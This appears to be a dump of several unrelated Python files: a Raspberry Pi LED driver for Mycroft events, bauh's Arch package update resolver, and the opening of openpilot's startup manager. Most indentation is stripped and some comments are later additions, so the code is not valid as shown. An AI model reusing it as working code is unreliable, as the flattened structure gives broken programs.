def gasd(argv=sys.argv[1:]):
parser = argparse.ArgumentParser(prog='gasd', usage='%(prog)s <module>',
description=u'Central %(prog)s station debugger')
parser.add_argument(u'module', nargs=1, help=u'Debug in module mode')
opts = parser.parse_args(argv)
monitor_module(opts.module[0])
def gas_run(argv=sys.argv[1:]):
pass
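# Minimal sketch (not in the original file): allow the argument-parsing entry point defined
# above to be used when this module is executed directly as a script.
if __name__ == '__main__':
    gasd()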
|
lights.py
|
import itertools
import json
import threading
import time
import RPi.GPIO as GPIO
def on_message(ws, message):
mes = json.loads(message)
print(mes)
if mes['type'] == 'recognizer_loop:record_begin':
my_led.set_state(LED.ON)
if mes['type'] == 'recognizer_loop:audio_output_start':
my_led.set_state(LED.BEACON)
if mes['type'] == 'recognizer_loop:record_end':
my_led.set_state(LED.OFF)
if mes['type'] == 'recognizer_loop:audio_output_end':
my_led.set_state(LED.OFF)
def on_error(ws, error):
print(error)
def on_close(ws):
print("### closed ###")
class LED:
"""Starts a background thread to show patterns with the LED.
Simple usage:
my_led = LED(channel = 25)
my_led.start()
my_led.set_state(LED.BEACON)
my_led.stop()
"""
OFF = 0
ON = 1
BLINK = 2
BLINK_3 = 3
BEACON = 4
BEACON_DARK = 5
DECAY = 6
PULSE_SLOW = 7
PULSE_QUICK = 8
def __init__(self, channel):
self.animator = threading.Thread(target=self._animate)
self.channel = channel
self.iterator = None
self.running = False
self.state = None
self.sleep = 0
GPIO.setmode(GPIO.BCM)
GPIO.setup(channel, GPIO.OUT)
self.pwm = GPIO.PWM(channel, 100)
self.lock = threading.Lock()
def __del__(self):
self.stop()
GPIO.cleanup(self.channel)
def start(self):
"""Start the LED driver."""
with self.lock: # pylint: disable=E1129
if not self.running:
self.running = True
self.pwm.start(0) # off by default
self.animator.start()
def stop(self):
"""Stop the LED driver and sets the LED to off."""
with self.lock: # pylint: disable=E1129
if self.running:
self.running = False
self.animator.join()
self.pwm.stop()
def set_state(self, state):
"""Set the LED driver's new state.
Note the LED driver must be started for this to have any effect.
"""
with self.lock: # pylint: disable=E1129
self.state = state
def _animate(self):
while True:
state = None
running = False
with self.lock: # pylint: disable=E1129
state = self.state
self.state = None
running = self.running
if not running:
return
if state is not None:
if not self._parse_state(state):
raise ValueError('unsupported state: %d' % state)
if self.iterator:
self.pwm.ChangeDutyCycle(next(self.iterator))
time.sleep(self.sleep)
else:
# We can also wait for a state change here with a Condition.
time.sleep(1)
def _parse_state(self, state):
self.iterator = None
self.sleep = 0.0
handled = False
if state == self.OFF:
self.pwm.ChangeDutyCycle(0)
handled = True
elif state == self.ON:
self.pwm.ChangeDutyCycle(100)
handled = True
elif state == self.BLINK:
self.iterator = itertools.cycle([0, 100])
self.sleep = 0.5
handled = True
elif state == self.BLINK_3:
self.iterator = itertools.cycle([0, 100] * 3 + [0, 0])
self.sleep = 0.25
handled = True
elif state == self.BEACON:
self.iterator = itertools.cycle(
itertools.chain([30] * 100, [100] * 8, range(100, 30, -5)))
self.sleep = 0.05
handled = True
elif state == self.BEACON_DARK:
self.iterator = itertools.cycle(
itertools.chain([0] * 100, range(0, 30, 3), range(30, 0, -3)))
self.sleep = 0.05
handled = True
elif state == self.DECAY:
self.iterator = itertools.cycle(range(100, 0, -2))
self.sleep = 0.05
handled = True
elif state == self.PULSE_SLOW:
self.iterator = itertools.cycle(
itertools.chain(range(0, 100, 2), range(100, 0, -2)))
self.sleep = 0.1
handled = True
elif state == self.PULSE_QUICK:
self.iterator = itertools.cycle(
itertools.chain(range(0, 100, 5), range(100, 0, -5)))
self.sleep = 0.05
handled = True
return handled
my_led = LED(channel=25)
my_led.start()
my_led.set_state(LED.PULSE_QUICK)
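# A minimal sketch (assumption, not in the original file) of how the callbacks above could be
# wired to the Mycroft message bus with the 'websocket-client' package; the URL shown is the
# commonly used default and may differ on a given install:
#   import websocket
#   ws = websocket.WebSocketApp("ws://localhost:8181/core",
#                               on_message=on_message,
#                               on_error=on_error,
#                               on_close=on_close)
#   ws.run_forever()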
|
updates.py
|
import logging
import time
import traceback
from threading import Thread
from typing import Dict, Set, List, Tuple, Iterable, Optional
from packaging.version import parse as parse_version
from bauh.api.abstract.controller import UpgradeRequirements, UpgradeRequirement
from bauh.api.abstract.handler import ProcessWatcher
from bauh.gems.arch import pacman, sorting
from bauh.gems.arch.aur import AURClient
from bauh.gems.arch.dependencies import DependenciesAnalyser
from bauh.gems.arch.exceptions import PackageNotFoundException
from bauh.gems.arch.model import ArchPackage
from bauh.gems.arch.pacman import RE_DEP_OPERATORS
from bauh.view.util.translation import I18n
class UpdateRequirementsContext:
def __init__(self, to_update: Dict[str, ArchPackage], repo_to_update: Dict[str, ArchPackage],
aur_to_update: Dict[str, ArchPackage], repo_to_install: Dict[str, ArchPackage],
aur_to_install: Dict[str, ArchPackage], to_install: Dict[str, ArchPackage],
pkgs_data: Dict[str, dict], cannot_upgrade: Dict[str, UpgradeRequirement],
to_remove: Dict[str, UpgradeRequirement], installed_names: Set[str], provided_map: Dict[str, Set[str]],
aur_index: Set[str], arch_config: dict, remote_provided_map: Dict[str, Set[str]], remote_repo_map: Dict[str, str],
root_password: str, aur_supported: bool):
self.to_update = to_update
self.repo_to_update = repo_to_update
self.aur_to_update = aur_to_update
self.repo_to_install = repo_to_install
self.aur_to_install = aur_to_install
self.pkgs_data = pkgs_data
self.cannot_upgrade = cannot_upgrade
self.root_password = root_password
self.installed_names = installed_names
self.provided_map = provided_map
self.to_remove = to_remove
self.to_install = to_install
self.aur_index = aur_index
self.arch_config = arch_config
self.remote_provided_map = remote_provided_map
self.remote_repo_map = remote_repo_map
self.aur_supported = aur_supported
class UpdatesSummarizer:
def __init__(self, aur_client: AURClient, i18n: I18n, logger: logging.Logger, deps_analyser: DependenciesAnalyser, aur_supported: bool, watcher: ProcessWatcher):
self.aur_client = aur_client
self.i18n = i18n
self.logger = logger
self.watcher = watcher
self.deps_analyser = deps_analyser
self.aur_supported = aur_supported
def _fill_aur_pkg_update_data(self, pkg: ArchPackage, output: dict):
output[pkg.name] = self.aur_client.map_update_data(pkg.get_base_name(), pkg.latest_version)
def _handle_conflict_both_to_install(self, pkg1: str, pkg2: str, context: UpdateRequirementsContext):
for src_pkg in {p for p, data in context.pkgs_data.items() if
                            data['d'] and (pkg1 in data['d'] or pkg2 in data['d'])}:
if src_pkg not in context.cannot_upgrade:
reason = self.i18n['arch.update_summary.to_install.dep_conflict'].format("'{}'".format(pkg1),
"'{}'".format(pkg2))
context.cannot_upgrade[src_pkg] = UpgradeRequirement(context.to_update[src_pkg], reason)
del context.to_update[src_pkg]
if src_pkg in context.repo_to_update:
del context.repo_to_update[src_pkg]
else:
del context.aur_to_update[src_pkg]
del context.pkgs_data[src_pkg]
for p in (pkg1, pkg2):
if p in context.to_install:
del context.to_install[p]
if p in context.repo_to_install:
del context.repo_to_install[p]
else:
del context.aur_to_install[p]
def _handle_conflict_to_update_and_to_install(self, pkg1: str, pkg2: str, pkg1_to_install: bool, context: UpdateRequirementsContext):
to_install, to_update = (pkg1, pkg2) if pkg1_to_install else (pkg2, pkg1)
to_install_srcs = {p for p, data in context.pkgs_data.items() if data['d'] and to_install in data['d']}
if to_update not in context.cannot_upgrade:
srcs_str = ', '.join(("'{}'".format(p) for p in to_install_srcs))
reason = self.i18n['arch.update_summary.to_update.conflicts_dep'].format("'{}'".format(to_install),
srcs_str)
context.cannot_upgrade[to_install] = UpgradeRequirement(context.to_update[to_update], reason)
if to_update in context.to_update:
del context.to_update[to_update]
for src_pkg in to_install_srcs:
src_to_install = src_pkg in context.to_install
pkg = context.to_install[src_pkg] if src_to_install else context.to_update[src_pkg]
if src_pkg not in context.cannot_upgrade:
reason = self.i18n['arch.update_summary.to_update.dep_conflicts'].format("'{}'".format(to_install),
"'{}'".format(to_update))
context.cannot_upgrade[src_pkg] = UpgradeRequirement(pkg, reason)
if src_to_install:
del context.to_install[src_pkg]
if src_pkg in context.repo_to_install:
del context.repo_to_install[src_pkg]
else:
del context.aur_to_install[src_pkg]
else:
del context.to_update[src_pkg]
if src_pkg in context.repo_to_update:
del context.repo_to_update[src_pkg]
else:
del context.aur_to_update[src_pkg]
del context.pkgs_data[src_pkg]
if to_install in context.to_install:
del context.to_install[to_install]
def _handle_conflict_both_to_update(self, pkg1: str, pkg2: str, context: UpdateRequirementsContext):
if pkg1 not in context.cannot_upgrade:
reason = "{} '{}'".format(self.i18n['arch.info.conflicts with'].capitalize(), pkg2)
context.cannot_upgrade[pkg1] = UpgradeRequirement(pkg=context.to_update[pkg1], reason=reason)
if pkg2 not in context.cannot_upgrade:
reason = "{} '{}'".format(self.i18n['arch.info.conflicts with'].capitalize(), pkg1)
context.cannot_upgrade[pkg2] = UpgradeRequirement(pkg=context.to_update[pkg2], reason=reason)
for p in (pkg1, pkg2):
if p in context.to_update:
del context.to_update[p]
if p in context.repo_to_update:
del context.repo_to_update[p]
else:
del context.aur_to_update[p]
def _filter_and_map_conflicts(self, context: UpdateRequirementsContext) -> Dict[str, str]:
root_conflict = {}
mutual_conflicts = {}
for p, data in context.pkgs_data.items():
if data['c']:
for c in data['c']:
if c and c != p and c in context.installed_names:
# source = provided_map[c]
root_conflict[c] = p
if (p, c) in root_conflict.items():
mutual_conflicts[c] = p
if mutual_conflicts:
for pkg1, pkg2 in mutual_conflicts.items():
pkg1_to_install = pkg1 in context.to_install
pkg2_to_install = pkg2 in context.to_install
if pkg1_to_install and pkg2_to_install: # remove both from to install and mark their source packages as 'cannot_update'
self._handle_conflict_both_to_install(pkg1, pkg2, context)
elif (pkg1_to_install and not pkg2_to_install) or (not pkg1_to_install and pkg2_to_install):
self._handle_conflict_to_update_and_to_install(pkg1, pkg2, pkg1_to_install, context)
else:
self._handle_conflict_both_to_update(pkg1, pkg2, context) # adding both to the 'cannot update' list
for pkg1, pkg2 in mutual_conflicts.items(): # removing conflicting packages from the packages selected to upgrade
for p in (pkg1, pkg2):
if p in context.pkgs_data:
if context.pkgs_data[p].get('c'):
for c in context.pkgs_data[p]['c']:
# source = provided_map[c]
if c in root_conflict:
del root_conflict[c]
del context.pkgs_data[p]
return root_conflict
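    # Illustrative example (not from the original source): if selected packages 'a' and 'b'
    # are both installed and each declares a conflict with the other, the loop above builds
    # root_conflict == {'b': 'a', 'a': 'b'} and mutual_conflicts == {'a': 'b'} (only one
    # direction is kept), and the matching handler above then blocks or removes them.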
def _fill_conflicts(self, context: UpdateRequirementsContext, blacklist: Iterable[str] = None):
self.logger.info("Checking conflicts")
root_conflict = self._filter_and_map_conflicts(context)
if root_conflict:
for dep, source in root_conflict.items():
if dep not in context.to_remove and (not blacklist or dep not in blacklist):
req = ArchPackage(name=dep, installed=True, i18n=self.i18n)
reason = "{} '{}'".format(self.i18n['arch.info.conflicts with'].capitalize(), source)
context.to_remove[dep] = UpgradeRequirement(req, reason)
def _map_and_add_package(self, pkg_data: Tuple[str, str], idx: int, output: dict):
version = None
if pkg_data[1] == 'aur':
try:
info = self.aur_client.get_src_info(pkg_data[0])
if info:
version = info.get('pkgver')
if not version:
self.logger.warning("No version declared in SRCINFO of '{}'".format(pkg_data[0]))
else:
self.logger.warning("Could not retrieve the SRCINFO for '{}'".format(pkg_data[0]))
except:
self.logger.warning("Could not retrieve the SRCINFO for '{}'".format(pkg_data[0]))
else:
version = pacman.get_version_for_not_installed(pkg_data[0])
output[idx] = ArchPackage(name=pkg_data[0], version=version, latest_version=version, repository=pkg_data[1], i18n=self.i18n)
def _fill_to_install(self, context: UpdateRequirementsContext) -> bool:
ti = time.time()
self.logger.info("Discovering updates missing packages")
deps_data, deps_checked = {}, set()
deps = self.deps_analyser.map_missing_deps(pkgs_data=context.pkgs_data,
provided_map=context.provided_map,
aur_index=context.aur_index,
deps_checked=deps_checked,
sort=True,
deps_data=deps_data,
remote_provided_map=context.remote_provided_map,
remote_repo_map=context.remote_repo_map,
watcher=self.watcher,
automatch_providers=context.arch_config['automatch_providers'])
if deps is None:
tf = time.time()
self.logger.info("It took {0:.2f} seconds to retrieve required upgrade packages".format(tf - ti))
return False # the user called the process off
if deps: # filtering selected packages
selected_names = {p for p in context.to_update}
deps = [dep for dep in deps if dep[0] not in selected_names]
if deps:
sorted_pkgs = {}
aur_to_install_data = {}
all_to_install_data = {}
for idx, dep in enumerate(deps):
data = deps_data[dep[0]]
pkg = ArchPackage(name=dep[0], version=data['v'], latest_version=data['v'], repository=dep[1], i18n=self.i18n, package_base=data.get('b', dep[0]))
sorted_pkgs[idx] = pkg
context.to_install[dep[0]] = pkg
if pkg.repository == 'aur':
context.aur_to_install[pkg.name] = pkg
aur_to_install_data[pkg.name] = data
else:
context.repo_to_install[pkg.name] = pkg
if context.repo_to_install:
all_to_install_data.update(pacman.map_updates_data(context.repo_to_install.keys()))
if aur_to_install_data:
all_to_install_data.update(aur_to_install_data)
if all_to_install_data:
context.pkgs_data.update(all_to_install_data)
self._fill_conflicts(context, context.to_remove.keys())
if context.to_install:
self.__fill_provided_map(context=context, pkgs=context.to_install, fill_installed=False)
tf = time.time()
self.logger.info("It took {0:.2f} seconds to retrieve required upgrade packages".format(tf - ti))
return True
def __fill_provided_map(self, context: UpdateRequirementsContext, pkgs: Dict[str, ArchPackage], fill_installed: bool = True):
if pkgs:
ti = time.time()
self.logger.info("Filling provided names")
if not context.installed_names:
context.installed_names = pacman.list_installed_names()
installed_to_ignore = set()
for pkgname in pkgs:
pacman.fill_provided_map(pkgname, pkgname, context.provided_map)
if fill_installed:
installed_to_ignore.add(pkgname)
pdata = context.pkgs_data.get(pkgname)
if pdata and pdata['p']:
pacman.fill_provided_map('{}={}'.format(pkgname, pdata['v']), pkgname, context.provided_map)
ver_split = pdata['v'].split('-')
if len(ver_split) > 1:
pacman.fill_provided_map('{}={}'.format(pkgname, '-'.join(ver_split[0:-1])), pkgname, context.provided_map)
for p in pdata['p']:
pacman.fill_provided_map(p, pkgname, context.provided_map)
split_provided = p.split('=')
if len(split_provided) > 1 and split_provided[0] != p:
pacman.fill_provided_map(split_provided[0], pkgname, context.provided_map)
if installed_to_ignore: # filling the provided names of the installed
installed_to_query = context.installed_names.difference(installed_to_ignore)
if installed_to_query:
context.provided_map.update(pacman.map_provided(remote=False, pkgs=installed_to_query))
tf = time.time()
self.logger.info("Filling provided names took {0:.2f} seconds".format(tf - ti))
def __fill_aur_index(self, context: UpdateRequirementsContext):
if context.aur_supported:
self.logger.info("Loading AUR index")
names = self.aur_client.read_index()
if names:
context.aur_index.update(names)
self.logger.info("AUR index loaded on the context")
def _map_requirement(self, pkg: ArchPackage, context: UpdateRequirementsContext, installed_sizes: Dict[str, int] = None, to_install: bool = False, to_sync: Set[str] = None) -> UpgradeRequirement:
requirement = UpgradeRequirement(pkg)
if pkg.repository != 'aur':
pkgdata = context.pkgs_data.get(pkg.name)
if pkgdata:
requirement.required_size = pkgdata['ds']
requirement.extra_size = pkgdata['s']
current_size = installed_sizes.get(pkg.name) if installed_sizes else None
if current_size is not None and pkgdata['s']:
requirement.extra_size = pkgdata['s'] - current_size
required_by = set()
if to_install and to_sync and context.pkgs_data:
names = pkgdata.get('p', {pkg.name}) if pkgdata else {pkg.name}
to_sync_deps_cache = {}
for p in to_sync:
if p != pkg.name and p in context.pkgs_data:
deps = to_sync_deps_cache.get(p)
if deps is None:
deps = context.pkgs_data[p]['d']
if deps is None:
deps = set()
else:
deps = {RE_DEP_OPERATORS.split(d)[0] for d in deps}
to_sync_deps_cache[p] = deps
if deps:
for n in names:
if n in deps:
required_by.add(p)
break
requirement.reason = '{}: {}'.format(self.i18n['arch.info.required by'].capitalize(), ','.join(required_by) if required_by else '?')
return requirement
def summarize(self, pkgs: List[ArchPackage], root_password: str, arch_config: dict) -> UpgradeRequirements:
res = UpgradeRequirements([], [], [], [])
remote_provided_map = pacman.map_provided(remote=True)
remote_repo_map = pacman.map_repositories()
context = UpdateRequirementsContext(to_update={}, repo_to_update={}, aur_to_update={}, repo_to_install={},
aur_to_install={}, to_install={}, pkgs_data={}, cannot_upgrade={},
to_remove={}, installed_names=set(), provided_map={}, aur_index=set(),
arch_config=arch_config, root_password=root_password,
remote_provided_map=remote_provided_map, remote_repo_map=remote_repo_map,
aur_supported=self.aur_supported)
self.__fill_aur_index(context)
aur_data = {}
aur_srcinfo_threads = []
for p in pkgs:
context.to_update[p.name] = p
if p.repository == 'aur':
context.aur_to_update[p.name] = p
t = Thread(target=self._fill_aur_pkg_update_data, args=(p, aur_data), daemon=True)
t.start()
aur_srcinfo_threads.append(t)
else:
context.repo_to_update[p.name] = p
if context.aur_to_update:
for t in aur_srcinfo_threads:
t.join()
self.logger.info("Filling updates data")
if context.repo_to_update:
context.pkgs_data.update(pacman.map_updates_data(context.repo_to_update.keys()))
if aur_data:
context.pkgs_data.update(aur_data)
self.__fill_provided_map(context=context, pkgs=context.to_update)
if context.pkgs_data:
self._fill_conflicts(context)
try:
if not self._fill_to_install(context):
self.logger.info("The operation was cancelled by the user")
return
except PackageNotFoundException as e:
self.logger.error("Package '{}' not found".format(e.name))
return
if context.pkgs_data:
self._fill_dependency_breakage(context)
self.__update_context_based_on_to_remove(context)
if context.to_update:
installed_sizes = pacman.get_installed_size(list(context.to_update.keys()))
sorted_pkgs = []
            if context.repo_to_update:  # sort repo packages by name only (pacman already determines the best upgrade order)
sorted_pkgs.extend(context.repo_to_update.values())
sorted_pkgs.sort(key=lambda pkg: pkg.name)
            if context.aur_to_update:  # AUR packages are appended at the end
sorted_aur = sorting.sort(context.aur_to_update.keys(), context.pkgs_data, context.provided_map)
for aur_pkg in sorted_aur:
sorted_pkgs.append(context.aur_to_update[aur_pkg[0]])
res.to_upgrade = [self._map_requirement(pkg, context, installed_sizes) for pkg in sorted_pkgs]
if context.to_remove:
res.to_remove = [p for p in context.to_remove.values()]
if context.cannot_upgrade:
res.cannot_upgrade = [d for d in context.cannot_upgrade.values()]
if context.to_install:
            to_sync = {r.pkg.name for r in res.to_upgrade} if res.to_upgrade else set()
to_sync.update(context.to_install.keys())
res.to_install = [self._map_requirement(p, context, to_install=True, to_sync=to_sync) for p in context.to_install.values()]
res.context['data'] = context.pkgs_data
return res
def __update_context_based_on_to_remove(self, context: UpdateRequirementsContext):
if context.to_remove:
to_remove_provided = {}
            # collect all packages marked for synchronization (to update or to install) in the transaction context
to_sync = {*(context.to_update.keys() if context.to_update else set()), *(context.to_install.keys() if context.to_install else set())}
if to_sync: # checking if any packages to sync on the context rely on the 'to remove' ones
to_remove_provided.update(pacman.map_provided(remote=False, pkgs=context.to_remove.keys()))
to_remove_from_sync = {} # will store all packages that should be removed
for pname in to_sync:
if pname in context.pkgs_data:
deps = context.pkgs_data[pname].get('d')
if deps:
required = set()
for pkg in context.to_remove:
for provided in to_remove_provided[pkg]:
if provided in deps:
required.add(pkg)
break
if required:
to_remove_from_sync[pname] = required
else:
self.logger.warning("Conflict resolution: package '{}' marked to synchronization has no data loaded")
if to_remove_from_sync: # removing all these packages and their dependents from the context
self._add_to_remove(to_sync, to_remove_from_sync, context)
# checking if the installed packages that are not in the transaction context rely on the current packages to be removed:
current_to_remove = {*context.to_remove.keys()}
required_by_installed = self.deps_analyser.map_all_required_by(current_to_remove, {*to_sync})
if required_by_installed:
# updating provided context:
provided_not_mapped = set()
for pkg in current_to_remove.difference({*to_remove_provided.keys()}):
if pkg not in context.pkgs_data:
provided_not_mapped.add(pkg)
else:
provided = context.pkgs_data[pkg].get('p')
if provided:
to_remove_provided[pkg] = provided
else:
provided_not_mapped.add(pkg)
if provided_not_mapped:
to_remove_provided.update(pacman.map_provided(remote=False, pkgs=provided_not_mapped))
                deps_no_data = {dep for dep in required_by_installed if dep not in context.pkgs_data}
deps_nodata_deps = pacman.map_required_dependencies(*deps_no_data) if deps_no_data else {}
reverse_to_remove_provided = {p: name for name, provided in to_remove_provided.items() for p in provided}
for pkg in required_by_installed:
if pkg not in context.to_remove:
if pkg in context.pkgs_data:
dep_deps = context.pkgs_data[pkg].get('d')
else:
dep_deps = deps_nodata_deps.get(pkg)
if dep_deps:
source = ', '.join((reverse_to_remove_provided[d] for d in dep_deps if d in reverse_to_remove_provided))
reason = "{} '{}'".format(self.i18n['arch.info.depends on'].capitalize(), source if source else '?')
context.to_remove[pkg] = UpgradeRequirement(pkg=ArchPackage(name=pkg,
installed=True,
i18n=self.i18n),
reason=reason)
for name in context.to_remove: # upgrading lists
if name in context.pkgs_data:
del context.pkgs_data[name]
if name in context.aur_to_update:
del context.aur_to_update[name]
if name in context.repo_to_update:
del context.repo_to_update[name]
removed_size = pacman.get_installed_size([*context.to_remove.keys()])
if removed_size:
for name, size in removed_size.items():
if size is not None:
req = context.to_remove.get(name)
if req:
req.extra_size = size
def _add_to_remove(self, pkgs_to_sync: Set[str], names: Dict[str, Set[str]], context: UpdateRequirementsContext, to_ignore: Set[str] = None):
blacklist = to_ignore if to_ignore else set()
blacklist.update(names)
dependents = {}
for pname in pkgs_to_sync:
if pname not in blacklist:
data = context.pkgs_data.get(pname)
if data:
deps = data.get('d')
if deps:
for n in names:
if n in deps:
all_deps = dependents.get(n, set())
                                all_deps.add(pname)
dependents[n] = all_deps
else:
self.logger.warning("Package '{}' to sync could not be removed from the transaction context because its data was not loaded")
for n in names:
if n in context.pkgs_data:
if n not in context.to_remove:
depends_on = names.get(n)
if depends_on:
reason = "{} '{}'".format(self.i18n['arch.info.depends on'].capitalize(), ', '.join(depends_on))
else:
reason = '?'
context.to_remove[n] = UpgradeRequirement(pkg=ArchPackage(name=n,
installed=True,
i18n=self.i18n),
reason=reason)
all_deps = dependents.get(n)
if all_deps:
self._add_to_remove(pkgs_to_sync, {dep: {n} for dep in all_deps}, context, blacklist)
else:
self.logger.warning("Package '{}' could not be removed from the transaction context because its data was not loaded")
def _fill_dependency_breakage(self, context: UpdateRequirementsContext):
if bool(context.arch_config['check_dependency_breakage']) and (context.to_update or context.to_install):
ti = time.time()
self.logger.info("Begin: checking dependency breakage")
required_by = pacman.map_required_by(context.to_update.keys()) if context.to_update else {}
if context.to_install:
required_by.update(pacman.map_required_by(context.to_install.keys(), remote=True))
reqs_not_in_transaction = set()
reqs_in_transaction = set()
transaction_pkgs = {*context.to_update.keys(), *context.to_install.keys()}
for reqs in required_by.values():
for r in reqs:
if r in transaction_pkgs:
reqs_in_transaction.add(r)
elif r in context.installed_names:
reqs_not_in_transaction.add(r)
if not reqs_not_in_transaction and not reqs_in_transaction:
return
provided_versions = {}
for p in context.provided_map:
pkg_split = p.split('=')
if len(pkg_split) > 1:
versions = provided_versions.get(pkg_split[0])
if versions is None:
versions = set()
provided_versions[pkg_split[0]] = versions
versions.add(pkg_split[1])
if not provided_versions:
return
cannot_upgrade = set()
for pkg, deps in pacman.map_required_dependencies(*reqs_not_in_transaction).items():
self._add_dependency_breakage(pkgname=pkg,
pkgdeps=deps,
provided_versions=provided_versions,
cannot_upgrade=cannot_upgrade,
context=context)
for pkg in reqs_in_transaction:
data = context.pkgs_data[pkg]
if data and data['d']:
self._add_dependency_breakage(pkgname=pkg,
pkgdeps=data['d'],
provided_versions=provided_versions,
cannot_upgrade=cannot_upgrade,
context=context)
if cannot_upgrade:
cannot_upgrade.update(self._add_dependents_as_cannot_upgrade(context=context,
names=cannot_upgrade,
pkgs_available={*context.to_update.values(), *context.to_install.values()}))
for p in cannot_upgrade:
if p in context.to_update:
del context.to_update[p]
if p in context.repo_to_update:
del context.repo_to_update[p]
if p in context.aur_to_update:
del context.aur_to_update[p]
if p in context.pkgs_data:
del context.pkgs_data[p]
if p in context.to_install:
del context.to_install[p]
if p in context.repo_to_install:
del context.repo_to_install[p]
if p in context.aur_to_install:
del context.aur_to_install[p]
tf = time.time()
self.logger.info("End: checking dependency breakage. Time: {0:.2f} seconds".format(tf - ti))
def _add_dependents_as_cannot_upgrade(self, context: UpdateRequirementsContext, names: Iterable[str], pkgs_available: Set[ArchPackage], already_removed: Optional[Set[str]] = None, iteration_level: int = 0) -> Set[str]:
removed = set() if already_removed is None else already_removed
removed.update(names)
available = {p for p in pkgs_available if p.name not in removed}
to_remove = set()
if available:
for pkg in available:
if pkg.name not in removed:
data = context.pkgs_data.get(pkg.name)
if data and data['d']:
for dep in data['d']:
dep_providers = context.provided_map.get(dep)
if dep_providers:
for p in dep_providers:
if p in names:
to_remove.add(pkg.name)
if pkg.name not in context.cannot_upgrade:
reason = "{} {}".format(self.i18n['arch.info.depends on'].capitalize(), p)
context.cannot_upgrade[pkg.name] = UpgradeRequirement(pkg=pkg,
reason=reason,
sorting_priority=iteration_level - 1)
break
if to_remove:
removed.update(to_remove)
self._add_dependents_as_cannot_upgrade(context=context, names=to_remove, pkgs_available=available,
already_removed=to_remove, iteration_level=iteration_level-1)
return to_remove
def _add_dependency_breakage(self, pkgname: str, pkgdeps: Optional[Set[str]], provided_versions: Dict[str, Set[str]], cannot_upgrade: Set[str], context: UpdateRequirementsContext):
if pkgdeps:
for dep in pkgdeps:
dep_split = RE_DEP_OPERATORS.split(dep)
if len(dep_split) > 1 and dep_split[1]:
real_providers = context.provided_map.get(dep_split[0])
if real_providers:
versions = provided_versions.get(dep_split[0])
if versions:
op = ''.join(RE_DEP_OPERATORS.findall(dep))
if op == '=':
op = '=='
version_match = False
for v in versions:
try:
provided_version, required_version = parse_version(v), parse_version(dep_split[1])
if eval('provided_version {} required_version'.format(op)):
version_match = True
break
except:
self.logger.error("Error when comparing versions {} (provided) and {} (required)".format(v, dep_split[1]))
traceback.print_exc()
if not version_match:
for pname in real_providers:
if pname not in cannot_upgrade:
provider = context.to_update.get(pname)
if provider:
cannot_upgrade.add(pname)
reason = self.i18n['arch.sync.dep_breakage.reason'].format(pkgname, dep)
context.cannot_upgrade[pname] = UpgradeRequirement(pkg=provider,
reason=reason)
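    # Worked example (illustrative, not part of the original source): for a dependency string
    # such as 'libfoo>=2.0', RE_DEP_OPERATORS is used to split out the name 'libfoo' and the
    # required version '2.0', findall() recovers the operator '>=', and the loop above then
    # evaluates parse_version(provided) >= parse_version('2.0') for every version of 'libfoo'
    # provided by the transaction; if no provided version satisfies it, the provider is added
    # to 'cannot_upgrade'.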
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1140
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
  # whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
if __name__ == "__main__" and ANDROID:
from common.spinner import Spinner
from common.text_window import TextWindow
else:
from common.spinner import FakeSpinner as Spinner
from common.text_window import FakeTextWindow as TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
sys.exit(1)
else:
        # Build failed, log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
